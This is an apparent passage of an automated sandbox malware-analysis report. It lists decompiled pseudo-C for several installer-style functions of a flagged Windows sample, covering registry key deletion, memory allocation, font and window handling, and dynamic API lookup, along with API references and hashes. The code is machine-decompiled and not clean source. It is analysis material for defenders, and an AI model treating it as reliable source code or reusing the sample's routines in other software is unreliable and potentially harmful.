                                                                            0x004022f1
                                                                            0x00402c2d
                                                                            0x00402c39

                                                                            APIs
                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                                            • GlobalFree.KERNEL32(?), ref: 00402A06
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                            • String ID:
                                                                            • API String ID: 2667972263-0
                                                                            • Opcode ID: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                                                                            • Instruction ID: 8fc1a79e9ee36ebd610a2d663d7387b5f1fea8f48d7bc9e01940cd119f3fb53c
                                                                            • Opcode Fuzzy Hash: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                                                                            • Instruction Fuzzy Hash: 5831C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E0CB794C429BA8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 713C2480 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 85%
                                                                            			E713C2480(void* __edx) {
				void* _t37;
				signed int _t38;
				void* _t39;
				void* _t41;
				signed char* _t42;
				signed char* _t51;
				void* _t52;
				void* _t54;

				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
				while(1) {
					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
					_t52 = _t51[0x18];
					if(_t52 == 0) {
						goto L9;
					}
					_t41 = 0x1a;
					if(_t52 == _t41) {
						goto L9;
					}
					if(_t52 != 0xffffffff) {
						if(_t52 <= 0 || _t52 > 0x19) {
							_t51[0x18] = _t41;
							goto L12;
						} else {
							_t37 = E713C135A(_t52 - 1);
							L10:
							goto L11;
						}
					} else {
						_t37 = E713C12E3();
						L11:
						_t52 = _t37;
						L12:
						_t13 =  &(_t51[8]); // 0x1020
						_t42 = _t13;
						if(_t51[4] >= 0) {
						}
						_t38 =  *_t51 & 0x000000ff;
						_t51[0x1c] = 0;
						if(_t38 > 7) {
							L27:
							_t39 = GlobalFree(_t52);
							if( *(_t54 + 0x10) == 0) {
								return _t39;
							}
							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
							} else {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t38 * 4 +  &M713C25F8))) {
								case 0:
									 *_t42 = 0;
									goto L27;
								case 1:
									__eax = E713C13B1(__ebp);
									goto L21;
								case 2:
									 *__edi = E713C13B1(__ebp);
									__edi[1] = __edx;
									goto L27;
								case 3:
									__eax = GlobalAlloc(0x40,  *0x713c506c);
									 *(__esi + 0x1c) = __eax;
									__edx = 0;
									 *__edi = __eax;
									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x713c506c, __eax,  *0x713c506c, 0, 0);
									goto L27;
								case 4:
									__eax = E713C12CC(__ebp);
									 *(__esi + 0x1c) = __eax;
									L21:
									 *__edi = __eax;
									goto L27;
								case 5:
									__eax = GlobalAlloc(0x40, 0x10);
									_push(__eax);
									 *(__esi + 0x1c) = __eax;
									_push(__ebp);
									 *__edi = __eax;
									__imp__CLSIDFromString();
									goto L27;
								case 6:
									if( *__ebp != __cx) {
										__eax = E713C13B1(__ebp);
										 *__ebx = __eax;
									}
									goto L27;
								case 7:
									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
									( *(__esi + 0x18) - 1) *  *0x713c506c =  *0x713c5074 + ( *(__esi + 0x18) - 1) *  *0x713c506c * 2 + 0x18;
									 *__ebx =  *0x713c5074 + ( *(__esi + 0x18) - 1) *  *0x713c506c * 2 + 0x18;
									asm("cdq");
									__eax = E713C1510(__edx,  *0x713c5074 + ( *(__esi + 0x18) - 1) *  *0x713c506c * 2 + 0x18, __edx,  *0x713c5074 + ( *(__esi + 0x18) - 1) *  *0x713c506c * 2);
									goto L27;
							}
						}
					}
					L9:
					_t37 = E713C12CC(0x713c5044);
					goto L10;
				}
			}











                                                                            0x713c2494
                                                                            0x713c2498
                                                                            0x713c24a3
                                                                            0x713c24a3
                                                                            0x713c24aa
                                                                            0x713c24af
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c24b3
                                                                            0x713c24b6
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c24bb
                                                                            0x713c24c6
                                                                            0x713c24d6
                                                                            0x00000000
                                                                            0x713c24cd
                                                                            0x713c24cf
                                                                            0x713c24e5
                                                                            0x00000000
                                                                            0x713c24e5
                                                                            0x713c24bd
                                                                            0x713c24bd
                                                                            0x713c24e6
                                                                            0x713c24e6
                                                                            0x713c24e8
                                                                            0x713c24ec
                                                                            0x713c24ec
                                                                            0x713c24ef
                                                                            0x713c24ef
                                                                            0x713c24f7
                                                                            0x713c24ff
                                                                            0x713c2502
                                                                            0x713c25c1
                                                                            0x713c25c2
                                                                            0x713c25cd
                                                                            0x713c25f7
                                                                            0x713c25f7
                                                                            0x713c25dd
                                                                            0x713c25e9
                                                                            0x713c25df
                                                                            0x713c25df
                                                                            0x713c25df
                                                                            0x00000000
                                                                            0x713c2508
                                                                            0x713c2508
                                                                            0x00000000
                                                                            0x713c250f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c2517
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c2525
                                                                            0x713c2527
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c2548
                                                                            0x713c254e
                                                                            0x713c2551
                                                                            0x713c2553
                                                                            0x713c2563
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c2530
                                                                            0x713c2535
                                                                            0x713c2538
                                                                            0x713c2539
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c256f
                                                                            0x713c2575
                                                                            0x713c2576
                                                                            0x713c2579
                                                                            0x713c257a
                                                                            0x713c257c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c2588
                                                                            0x713c258b
                                                                            0x713c2597
                                                                            0x713c2599
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c25a5
                                                                            0x713c25b1
                                                                            0x713c25b4
                                                                            0x713c25b6
                                                                            0x713c25b9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c2508
                                                                            0x713c2502
                                                                            0x713c24db
                                                                            0x713c24e0
                                                                            0x00000000
                                                                            0x713c24e0

                                                                            APIs
                                                                            • GlobalFree.KERNEL32(00000000), ref: 713C25C2
                                                                              • Part of subcall function 713C12CC: lstrcpynW.KERNEL32(00000000,?,713C137F,00000019,713C11CA,-000000A0), ref: 713C12DC
                                                                            • GlobalAlloc.KERNEL32(00000040), ref: 713C2548
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 713C2563
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206470499574.00000000713C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 713C0000, based on PE: true
                                                                            • Associated: 00000002.00000002.206470427248.00000000713C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206470593147.00000000713C4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206470665891.00000000713C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_713c0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                            • String ID:
                                                                            • API String ID: 4216380887-0
                                                                            • Opcode ID: b38d542cf78b84698811baa9d6bc4e18e871636371a1b5ecc08690f067d1f984
                                                                            • Instruction ID: 03f9bb21040c2685aecb1f0c1cd4c180926e5659b142ec7529748f9dbc05b3aa
                                                                            • Opcode Fuzzy Hash: b38d542cf78b84698811baa9d6bc4e18e871636371a1b5ecc08690f067d1f984
                                                                            • Instruction Fuzzy Hash: 65419EB110830ADFD715DF29D840E26B7BDFB58B18F10891EE847965C1EB30E949CB61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 48%
                                                                            			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004063AA(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E0040690A(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                                                                            0x00402eb4
                                                                            0x00402ebd
                                                                            0x00402ec6
                                                                            0x00402ed2
                                                                            0x00402edb
                                                                            0x00402ee5
                                                                            0x00402f0a
                                                                            0x00402f10
                                                                            0x00402f15
                                                                            0x00402f16
                                                                            0x00402f46
                                                                            0x00402f1f
                                                                            0x00402f21
                                                                            0x00402f71
                                                                            0x00402f74
                                                                            0x00000000
                                                                            0x00402f7a
                                                                            0x00402f30
                                                                            0x00402f35
                                                                            0x00402f37
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00402f3f
                                                                            0x00402f44
                                                                            0x00402f45
                                                                            0x00402f45
                                                                            0x00402f52
                                                                            0x00402f5a
                                                                            0x00402f61
                                                                            0x00000000
                                                                            0x00402f8a
                                                                            0x00000000
                                                                            0x00402f69
                                                                            0x00402ef5
                                                                            0x00402f08
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00402f08
                                                                            0x00402f90

                                                                            APIs
                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CloseEnum$DeleteValue
                                                                            • String ID:
                                                                            • API String ID: 1354259210-0
                                                                            • Opcode ID: 8cb330a57336db5e00a931244e28e0c1e8cbbd051d222c2bd1499622aecedac4
                                                                            • Instruction ID: ca6229ec891c5908b4c2d3bab14ae3db7b9396451d72a40731f1c02386a45f13
                                                                            • Opcode Fuzzy Hash: 8cb330a57336db5e00a931244e28e0c1e8cbbd051d222c2bd1499622aecedac4
                                                                            • Instruction Fuzzy Hash: DA215A7150010ABBEF119F90CE89EEF7B7DEB50384F100076F909B21A0D7B49E54AA68
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 77%
                                                                            			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x434f00,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E00406484();
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











                                                                            0x00401d81
                                                                            0x00401d85
                                                                            0x00401d9a
                                                                            0x00401d87
                                                                            0x00401d89
                                                                            0x00401d8f
                                                                            0x00401d8f
                                                                            0x00401da0
                                                                            0x00401da3
                                                                            0x00401dad
                                                                            0x00401db0
                                                                            0x00401db8
                                                                            0x00401dc9
                                                                            0x00401dcc
                                                                            0x00401dd7
                                                                            0x00401dce
                                                                            0x00401dd0
                                                                            0x00401dd0
                                                                            0x00401ddb
                                                                            0x00401de5
                                                                            0x00401e0c
                                                                            0x00401e1b
                                                                            0x00401e29
                                                                            0x00401e31
                                                                            0x00401e39
                                                                            0x00401e39
                                                                            0x00401e42
                                                                            0x00401e48
                                                                            0x00402ba4
                                                                            0x00402ba4
                                                                            0x00402c2d
                                                                            0x00402c39

                                                                            APIs
                                                                            • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                                            • GetClientRect.USER32(?,?), ref: 00401DE5
                                                                            • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                                            • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                                            • DeleteObject.GDI32(00000000), ref: 00401E39
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                            • String ID:
                                                                            • API String ID: 1849352358-0
                                                                            • Opcode ID: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                                                                            • Instruction ID: b69f8f45c5cbb28dd5603d9b1d667d2ce3d3910c133b75fee4ecc707c572ca23
                                                                            • Opcode Fuzzy Hash: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                                                                            • Instruction Fuzzy Hash: 3321F672904119AFCB05DBA4DE45AEEBBB5EF08314F14003AFA45F62A0DB389951DB98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 73%
                                                                            			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdf0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40ce00 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40ce07 = 1;
				 *0x40ce04 = _t15 & 0x00000001;
				 *0x40ce05 = _t15 & 0x00000002;
				 *0x40ce06 = _t15 & 0x00000004;
				E0040657A(_t9, _t31, _t33, 0x40ce0c,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdf0);
				_push(_t18);
				_push(_t31);
				E00406484();
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                                                            0x00401e4e
                                                                            0x00401e59
                                                                            0x00401e5b
                                                                            0x00401e68
                                                                            0x00401e7f
                                                                            0x00401e84
                                                                            0x00401e91
                                                                            0x00401e96
                                                                            0x00401e9a
                                                                            0x00401ea5
                                                                            0x00401eac
                                                                            0x00401ebe
                                                                            0x00401ec4
                                                                            0x00401ec9
                                                                            0x00401ed3
                                                                            0x00402638
                                                                            0x0040156d
                                                                            0x00402ba4
                                                                            0x00402c2d
                                                                            0x00402c39

                                                                            APIs
                                                                            • GetDC.USER32(?), ref: 00401E51
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                              • Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                              • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll,00000000), ref: 00406779
                                                                            • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                                            • String ID:
                                                                            • API String ID: 2584051700-0
                                                                            • Opcode ID: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                                                                            • Instruction ID: 78b13ae86a0973dc2b43aa2eb6c1af0beb3c1ef463c522f55250376beecb9f8a
                                                                            • Opcode Fuzzy Hash: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                                                                            • Instruction Fuzzy Hash: 7001B571904241EFEB005BB0EE49B9A3FB4BB15301F108A39F541B71D2C7B904458BED
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 713C16BD Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E713C16BD(struct HINSTANCE__* _a4, short* _a8) {
				_Unknown_base(*)()* _t7;
				void* _t10;
				int _t14;

				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
				_t10 = GlobalAlloc(0x40, _t14);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
				_t7 = GetProcAddress(_a4, _t10);
				GlobalFree(_t10);
				return _t7;
			}






                                                                            0x713c16d7
                                                                            0x713c16e3
                                                                            0x713c16f0
                                                                            0x713c16f7
                                                                            0x713c1700
                                                                            0x713c170c

                                                                            APIs
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,713C22D8,?,00000808), ref: 713C16D5
                                                                            • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,713C22D8,?,00000808), ref: 713C16DC
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,713C22D8,?,00000808), ref: 713C16F0
                                                                            • GetProcAddress.KERNEL32(713C22D8,00000000), ref: 713C16F7
                                                                            • GlobalFree.KERNEL32(00000000), ref: 713C1700
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206470499574.00000000713C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 713C0000, based on PE: true
                                                                            • Associated: 00000002.00000002.206470427248.00000000713C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206470593147.00000000713C4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206470665891.00000000713C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_713c0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                            • String ID:
                                                                            • API String ID: 1148316912-0
                                                                            • Opcode ID: 89fd79939c9c2bb1e11406c80b1c322efae4f1ae5b0cf940551184fb39f32c11
                                                                            • Instruction ID: 56541cbd284baba1caeaf82e073ceb9c4e65cc770e3da3620a91d1dc8fd83923
                                                                            • Opcode Fuzzy Hash: 89fd79939c9c2bb1e11406c80b1c322efae4f1ae5b0cf940551184fb39f32c11
                                                                            • Instruction Fuzzy Hash: 92F0AC7324A1387FE6211AA78C4CD9BBE9DEF8B2F5B210215F628D21D086626D01D7F1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 59%
                                                                            			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E00406484();
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                                                            0x00401c43
                                                                            0x00401c45
                                                                            0x00401c4c
                                                                            0x00401c4f
                                                                            0x00401c52
                                                                            0x00401c5c
                                                                            0x00401c60
                                                                            0x00401c63
                                                                            0x00401c6c
                                                                            0x00401c6c
                                                                            0x00401c6f
                                                                            0x00401c73
                                                                            0x00401c7c
                                                                            0x00401c7c
                                                                            0x00401c7f
                                                                            0x00401c83
                                                                            0x00401c85
                                                                            0x00401cda
                                                                            0x00401cdc
                                                                            0x00401ce7
                                                                            0x00401cf1
                                                                            0x00401cf4
                                                                            0x00401cf4
                                                                            0x00401cfd
                                                                            0x00000000
                                                                            0x00401c87
                                                                            0x00401c8e
                                                                            0x00401c90
                                                                            0x00401c93
                                                                            0x00401c99
                                                                            0x00401ca0
                                                                            0x00401ca3
                                                                            0x00401ccb
                                                                            0x00401d03
                                                                            0x00401d03
                                                                            0x00401ca5
                                                                            0x00401cb3
                                                                            0x00401cbb
                                                                            0x00401cbe
                                                                            0x00401cbe
                                                                            0x00401ca3
                                                                            0x00401d06
